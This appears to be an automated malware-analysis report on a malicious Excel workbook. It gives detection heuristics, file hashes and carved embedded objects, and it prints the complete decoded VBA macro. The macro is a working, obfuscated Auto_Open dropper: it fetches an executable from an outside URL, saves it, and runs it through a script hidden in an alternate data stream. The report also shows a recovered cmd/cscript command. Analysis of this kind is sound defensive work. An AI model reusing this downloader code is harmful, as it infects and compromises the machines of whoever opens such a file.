Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 e760109b21e54172…

MALICIOUS

Office (OOXML)

44.5 KB Created: 2020-02-01 18:28:07 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2020-05-14
MD5: d9a4f7fcce19bef8c66dcb1fd0256780 SHA-1: beb58df4fba308580728f0b6dc3d055a3fa97290 SHA-256: e760109b21e5417279388dbe914cf532b5e6b4c97a39d9e560e7d493087f5c08
452 Risk Score

Heuristics 13

  • Equation Editor OLE object high CVE related OLE_EQUATION_EDITOR
    Embedded OLE object xl/embeddings/oleObject3.bin contains the Equation Editor CLSID, the legacy component exploited by CVE-2017-11882, CVE-2018-0802, and CVE-2018-0798.
  • Embedded Office object carries macros critical OFFICE_EMBEDDED_MACRO_OBJECT
    This document embeds a second Office file that itself contains a VBA macro project or an Excel 4.0 (XLM) macro sheet. Hiding a macro-bearing workbook or document inside another document — frequently under an obfuscated, non-standard part name — is a macro-smuggling technique that defeats scanners which only inspect the outer document's macro storage. No benign authoring workflow stages a hidden macro project this way.
  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    s = s + "       m = sWScript + ""Shell""'hu4u4hu4uh4uhu4hu4" + vbCrLf
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Wscript = "Wscript.Shell"
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    Path = "C:\Windows\System32\wscript.exe "
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    s = s + "    varob = ""CreateObject"" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Payload URL recovered from embedded OLE object (1 URL) info OOXML_EMBEDDED_OBJECT_URL
    An embedded OLE object (xl/word/ppt embeddings) carries a next-stage download URL in its Ole10Native/Package stream — stored literally (incl. UTF-16) or base64-encoded — which the package-level URL sweep does not see. Surfaced as an IOC; self-validating (only real payload hosts).
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.haomen.co/sv.exe In document text (OOXML body / shared strings)

Extracted artifacts 11

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 14736 bytes
SHA-256: fdd2ec116aaade8cc9e8bcd361581d960079c03f07df162c6dcc20d32e2063d2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Auto_Open()
s = s + "fsdfdsfs = ""Z2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdkZ2RmZ2RmZ2RmZ2RnZGZnZGZnZGZnZGdkZmdkZmdkZmdk""" + vbCrLf
s = s + "fsdfdsfs = ""aHR0cHM6Ly93d3cuaGFvbWVuLmNvL3N2LmV4ZQ=="" " + vbCrLf
s = s + "yulkytjtrhtjrkdsarjky =""cHV0dHkuZXhl""" + vbCrLf
s = s + "'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "itype = ""bin""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "itype = itype + ""."" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "itype = itype + ""base""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "itype = itype + ""64"" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "dim after, path'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "after = ""later"" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "dim filestring'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "dim linkstring'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "Sub ase64Decode(ByVal sBase64EncodedText, ByVal fIsUtf16LE) '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Dim sTextEncoding'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    if fIsUtf16LE Then sTextEncoding = ""utf-16le"" Else sTextEncoding = ""utf-8""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    'He was disappointed when he found the beach to be so sandy and the sun so sunny.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    varob = ""CreateObject"" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Execute(""Set alxmd = "" + varob + ""(""""Msxml2.DOMDocument"""").CreateElement(""""aux"""")"") '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   alxmd.DataType = itype'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    alxmd.Text = sBase64EncodedText '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    aaax = ""ADODB.Stream""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    novarue = ""Node""" + vbCrLf
s = s + "    Execute(""novarue = novarue + """"TypedValue"""""")" + vbCrLf
s = s + "    Execute(""byteArray = alxmd."" + novarue)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    If LCase(sTextEncoding) = ""utf-16le"" then '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    'Someone I know recently combined Maple Syrup & buttered Popcorn thinking it would taste like caramel popcorn. It didn’t and they don’t recommend anyone else do it either.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        filestring = CStr(byteArray)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Else ' Convert the specified text encoding to a VBScript string.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        ' Create a binary stream and copy the input byte array to it.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            varob = ""CreateObject"" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            Execute(""Set baax = "" + varob + ""(aaax)"")'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Type = 1 ' adTypeBinary '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            Execute(""baax."" + ""Open"")'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Write byteArray'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            'It would have been a better night if the guys next to us weren't in the splash zone.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Position = 0'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Type = 2 ' adTypeText'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.CharSet = sTextEncoding'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            filestring = baax.ReadText'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Close'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    End If'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "end sub'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "Sub tse64Decode(ByVal sBase64EncodedText, ByVal fIsUtf16LE)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Dim sTextEncoding '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    if fIsUtf16LE Then sTextEncoding = ""utf-16le"" Else sTextEncoding = ""utf-8""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    ' Use an aux. XML document with a Base64-encoded element. '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    ' available via .todeTypedValue, which we can pass to BytesToStr() '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    varob = ""CreateObject""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Execute(""Set alxmd = "" + varob + ""(""""Msxml2.DOMDocument"""").CreateElement(""""aux"""")"")'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   alxmd.DataType = itype'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    alxmd.Text = sBase64EncodedText '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    aaax = ""ADODB.Stream"" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    novarue = ""Node""" + vbCrLf
s = s + "    Execute(""novarue = novarue + """"TypedValue"""""")" + vbCrLf
s = s + "    Execute(""byteArray = alxmd."" + novarue)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    If LCase(sTextEncoding) = ""utf-16le"" then'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        ' UTF-16 LE happens to be VBScript's internal encoding, so we can'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        ' take a shortcut and use CStr() to directly convert the byte array'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        ' to a string.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        linkstring = CStr(byteArray)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Else ' Convert the specified text encoding to a VBScript string.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        ' Create a binary stream and copy the input byte array to it. '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            varob = ""CreateObject""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            Execute(""Set baax = "" + varob + ""(aaax)"") '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Type = 1 ' adTypeBinary'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            Execute(""baax."" + ""Open"") '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Write byteArray'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            ' Now change the type to text, set the encoding, and output the 'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            ' result as text. '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Position = 0'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Type = 2 ' adTypeText'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.CharSet = sTextEncoding'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            linkstring = baax.ReadText '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "            baax.Close'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    End If'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "end sub'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "call ase64Decode(yulkytjtrhtjrkdsarjky,False) 'filestring'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "call tse64Decode(fsdfdsfs,False) 'linkstring'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "Sub HTxTPDownload( aa, bb )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   cobvar = ""Scripting.FileSystemObject""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   Set fso = CreateObject(cobvar) '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   path = ""C:""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   path = path + ""\program""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   path = path + ""data""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   path = path + ""\asc.txt""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   If (fso.FileExists(path)) Then '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "     fso.DeleteFile(path)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "      msg = path & "" exists.""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "      Execute(""MyURL=aa:MyPath=bb"") '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "      sWScript = ""WScript""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "       sWScript = sWScript + "".""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "       m = sWScript + ""Shell""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "       Execute(""l=m"") '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "       set just_obj = CreateObject(l)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   Else'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "      msg = path & "" doesn't exist.""'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   End If'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Dim i, objFile, objFSO, objHTTP, strFile, strMsg'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Const ForReading = 1, ForWriting = 2, ForAppending = 8 '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Set objFSO = CreateObject(cobvar)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    If objFSO.FolderExists( myPath ) Then'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev( myURL, ""/"" ) + 1 ) )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath, ""\"" ) - 1 ) ) Then'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        'If any cop asks you where you were, just say you were visiting Kansas.'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        strFile = myPath'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Else'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        WScript.Echo ""If you don't like toenails, you probably shouldn't look at your feet."" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "        Exit Sub'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    End If'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Set objHTTP = CreateObject( ""WinHttp.WinHttpRequest.5.1"" )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   'Set objHTTP = CreateObject( ""Microsoft.XMLHTTP"" )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   dim stream_obj'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   ado = ""ADODB.Stream"" '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   set stream_obj = CreateObject(ado)'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    Execute(""objHT"" + ""TP."" + ""Open """"GET"""", myURL, False"")'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    objHTTP.Send'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   stream_obj.type = 1'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   Execute(""stream_obj."" + ""open"")'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   stream_obj.write objHTTP.ResponseBody '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "   Execute(""stream_obj.save"" + ""tofile strFile, 2"")'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    ' Write the  byte stream to the target file'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    'For i = 1 To LenB( objHTTP.ResponseBody )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    '    objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    'Next'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    ' Close the target file'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "    'objFile.Close( )'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "End Sub'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "yulkytjtrhtjrkdsarjky = filestring'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "yulkytjtrhtjrkdsarjky = ""C:"" + ""\Program"" + ""Data\"" + yulkytjtrhtjrkdsarjky'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "fsdfdsfs = linkstring '37491'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "HTxTPDownload fsdfdsfs, yulkytjtrhtjrkdsarjky'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "dim just_obj'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "RUNC = yulkytjtrhtjrkdsarjky'hu4u4hu4uh4uhu4hu4" + vbCrLf
s = s + "Execute(""just_obj."" + ""exec RUNC"")" + vbCrLf

    On Error Resume Next
    Wscript = "Wscript.Shell"
    Set oknbvcfgh = CreateObject(Wscript)

    'If Error WS Does not exist
    If Err.Number <> 0 Then
        DoesWSExist = False
    Else '37491
        DoesWSExist = True '37491
    End If
 
    On Error GoTo -1
j = ".S" + "hell"
Range("A1:C1").Select

Selection.Font.Name = "Arial" '37491
Selection.Font.Bold = True
Selection.Font.Italic = True
Selection.Interior.Color = vbGreen
xzxz = "Ws" + "cr" + "ipt" + j
x = "C:"
x = x + "\program"
x = x + "data"
x = x + "\asc.txt"
Dim i As Integer
On Error GoTo Last
'ii = InputBox("Enter Value", "Enter Serial Numbers")
For i = 1 To i
ActiveCell.Offset(1, 0).Activate
Next i
Last:

On Error GoTo Handler '37491
Application.EnableEvents = False

Handler:
Dim gfdgfdgdf As Object
sdfsdfs = "Scri"
sdfsdfs = sdfsdfs + "pting."
smallvar = "File"
smallvar = smallvar + "SystemObject" '37491

Set gfdgfdgdf = CreateObject(sdfsdfs + smallvar)
Dim oFile As Object
'Set oFile = gfdgfdgdf.CreateTextFile("C:\secret\test1.txt") '37491
Set oFile = gfdgfdgdf.CreateTextFile(x + ":script1" + ".vbs")
    On Error Resume Next

    
    'If Error WS Does not exist
    If Err.Number <> 0 Then

    End If
 
    On Error GoTo -1
Application.Execute ("oFile.WriteLine s"): oFile.WriteLine s '#############################
'oFile.Close
Application.Execute (Selection.Font.Name = "Arial"): Set gfdgfdgdf = Nothing
Path = "C:\Windows\System32\wscript.exe "
File = x + ":script1"
File = File + "." + "vb"
File = File + "s"

'The trick to getting kids to eat anything is to put catchup on it.It's much more difficult to play tennis with a bowling ball than it is to bowl with a tennis ball.The sky is clear; the stars are twinkling.:x = Shell(Path + " " + File, vbNormalFocus)
x = Shell(Path + File, vbNormalFocus) ''The trick to getting kids to eat anything is to put catchup on it.It's much more difficult to play tennis with a bowling ball than it is to bowl with a tennis ball.The sky is clear; the stars are twinkling.

End Sub
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject3.bin 5936 bytes
SHA-256: 6cd73f15b74e03d90e8d8f88ec9cbb3032bafeefc1026727883d9f3cc83c62b9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): cmd /c ren %tmp%\yy y.js&CSCRIPT %tmp%\y.js  C
ooxml_oleobject_01.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject1.bin 3584 bytes
SHA-256: 9272ad12e53d8d9d22bf789063b66c0d41ba75e9ae5eabd1db8c9e56da20efc5
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.Shell");
ooxml_oleobject_01_ole10native_00.bin ole-package OOXML xl/embeddings/oleObject1.bin Ole10Native stream: Ole10Native 900 bytes
SHA-256: a972ea3752b31e4b5988ad8fabd1029c06061e5104a61651c2da81be876f6176
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.Shell");
ooxml_oleobject_01_ole10native_00_yy ole-package-payload OOXML xl/embeddings/oleObject1.bin Ole10Native payload: display_name=yy; full_path=C:\Users\Win10\AppData\Local\Temp\yy; temp_path=; def_file= 606 bytes
SHA-256: 858939c6a0f5392e636db54ca9d47148ee5f9e0e46fb81a4d33206b1134324f0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 shell/COM execution token(s).
ooxml_oleobject_02.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject2.bin 9216 bytes
SHA-256: d0f093ac7a260ba06e6cf6de02d1dc7e293b00b17f4dcd669994801e0d2e86f3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.ScriptFullName, WScript = "WScript" '37491, WScript = sWScript + "."
ooxml_oleobject_02_ole10native_00.bin ole-package OOXML xl/embeddings/oleObject2.bin Ole10Native stream: Ole10Native 6302 bytes
SHA-256: 0aa303f00d49a380f6934a8b3e5c044fd8079cac1acd61fb3383846f6d5e5f8f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.ScriptFullName, WScript = "WScript" '37491, WScript = sWScript + "."
ooxml_oleobject_02_ole10native_00_xx ole-package-payload OOXML xl/embeddings/oleObject2.bin Ole10Native payload: display_name=xx; full_path=C:\Users\Win10\AppData\Local\Temp\xx; temp_path=; def_file= 6008 bytes
SHA-256: 7da052357a0dfbfbec6e3c24e90471798b04fe1722d26a26fad7680f9c1ed036
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
ooxml_oleobject_03.bin ooxml-ole-object OOXML embedded OLE part: xl/vbaProject.bin 35328 bytes
SHA-256: a552dba14c37ac63ada0769b98c4614a0d830ce62b3aba3c9b032d0755c7b88b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript = "WScript"'hu4u4hu4uh4uhu4hu4, WScript = sWScript + "."'hu4u4hu4uh4uhu4hu4, WScript + "Shell"'hu4u4hu4uh4uhu4hu4
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 4968 bytes
SHA-256: 979dde2aed02f077c16ae53546c6df9eed40e8386d6db6fc36aee9f966d2cb82
emf_01.emf ooxml-emf OOXML EMF part: xl/media/image2.emf 1536 bytes
SHA-256: 4d4d1e7b04c99dcb8e885915068ad6f74cc2333e91580cdae5ccaa00c427247f

Open this report in the interactive analyzer, or submit your own file for analysis.